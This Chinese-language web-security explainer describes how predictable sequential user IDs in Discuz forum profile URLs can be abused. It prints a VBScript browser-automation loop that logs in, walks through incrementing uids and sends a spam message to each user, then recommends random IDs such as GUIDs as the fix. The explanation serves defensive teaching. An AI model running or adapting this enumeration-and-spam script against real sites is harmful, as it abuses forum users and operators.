WEB应用程序由于放在网络上,很容易被访问,一些安全信息也很容易暴露,例如用户数据、服务器信息等,这些泄漏的信息有些可以直接被使用,例如用户的帐号信息,有些可以被间接地利用,例如Discuz论坛对于用户资料的访问,由于用户ID是可预见的,例如:
http://bbs.XXX.com/space.php?action=viewpro&uid=10000
这里uid是可预见的,按注册顺序递增上去。
恶意用户可以利用这些信息,例如想群发信息给论坛用户,可以用类似如下的脚本:
SystemUtil.Run "iexplore" , "http://bbs.XXX.com/"
Browser("XXX").Navigate "http://bbs.XXX.com/"
Browser("XXX").Page("XXX").Link("登录").Click
Browser("XXX").Page("XXX").WebEdit("username").Set "user1"
Browser("XXX").Page("XXX").WebEdit("password").Set "userpasswd"
Browser("XXX").Page("XXX").WebButton("登录").Click
uid = 10000
On Error Resume Next
For I = 0 to 10
uid = uid + 1
Browser("XXX").Navigate "http://bbs.XXX.com/space.php?action=viewpro&uid=" & uid
Browser("XXX").Page("XXX").Link("发短消息").Click
Browser("XXX").Page("XXX").WebEdit("message").Click
Browser("XXX").Page("XXX").WebEdit("message").Set "垃圾信息!"
Browser("XXX").Page("XXX").WebButton("发送").Click
Wait 15
Next
Browser("XXX").Page("XXX").Link("退出").Click
SystemUtil.CloseProcessByName "iexplore"
如果Discuz论坛对于用户ID号的设计做一些更改,不使用可预见的ID(顺序注册),而是使用随机号(例如GUID),那么被利用的可能性就大大降低了。